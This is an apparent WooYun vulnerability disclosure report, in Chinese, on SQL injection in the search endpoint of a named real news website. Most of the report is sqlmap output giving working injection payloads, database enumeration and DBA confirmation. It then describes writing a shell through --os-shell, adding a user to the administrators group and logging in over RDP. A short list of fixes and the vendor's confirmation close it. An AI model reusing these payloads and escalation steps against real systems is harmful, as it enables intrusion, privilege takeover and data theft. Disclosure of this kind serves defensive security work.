乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-09: 细节已通知厂商并且等待厂商处理中 2015-04-10: 厂商已经确认,细节仅向厂商公开 2015-04-20: 细节向核心白帽子及相关领域专家公开 2015-04-30: 细节向普通白帽子公开 2015-05-10: 细节向实习白帽子公开 2015-05-25: 细节向公众公开
rt...
POST注入:http://www.dgrb.cn/searchprocess.aspx --data="pst=1"
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: pst Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: pst=1' AND 7029=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(121)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7029=7029) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(114)+CHAR(104)+CHAR(99)+CHAR(113))) AND 'FeeJ'='FeeJ Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: pst=1' UNION ALL SELECT CHAR(113)+CHAR(101)+CHAR(121)+CHAR(107)+CHAR(113)+CHAR(117)+CHAR(89)+CHAR(107)+CHAR(108)+CHAR(85)+CHAR(105)+CHAR(110)+CHAR(79)+CHAR(72)+CHAR(85)+CHAR(113)+CHAR(114)+CHAR(104)+CHAR(99)+CHAR(113)-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: pst=1'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: pst=1' WAITFOR DELAY '0:0:5'-----[10:00:25] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[10:00:25] [INFO] testing if current user is DBAcurrent user is DBA: True[10:00:26] [INFO] fetching database names[10:00:26] [INFO] the SQL query used returns 14 entries[10:00:26] [INFO] retrieved: "adbooking"[10:00:26] [INFO] retrieved: "adbooking"[10:00:27] [INFO] retrieved: "DgMedia"[10:00:27] [INFO] retrieved: "ggBooking"[10:00:27] [INFO] retrieved: "infomation"[10:00:27] [INFO] retrieved: "master"[10:00:27] [INFO] retrieved: "model"[10:00:28] [INFO] retrieved: "msdb"[10:00:28] [INFO] retrieved: "ReportServer"[10:00:28] [INFO] retrieved: "ReportServerTempDB"[10:00:28] [INFO] retrieved: "tempdb"[10:00:28] [INFO] retrieved: "tst"[10:00:29] [INFO] retrieved: "ums"[10:00:29] [INFO] retrieved: "weight"available databases [13]: [*] adbooking[*] DgMedia[*] ggBooking[*] infomation[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] tst[*] ums[*] weight
因为拥有DBA的权限,由上图报错知道网站的绝对路径,那么我想写入一个shell不是啥问题利用sqlmap的--os-shell查看服务器信息
这个账号我不知道该不该存在
再把123添加到administrator组,连接3389登陆不是问题(3389端口开启这哦!)
1.参数过滤2.低权限运行数据库3.关闭不必要的端口
危害等级:高
漏洞Rank:12
确认时间:2015-04-10 10:40
非常感谢您的报告。报告中的问题已确认并复现.影响的数据:高攻击成本:低造成影响:高综合评级为:高,rank:12正在联系相关网站管理单位处置。
暂无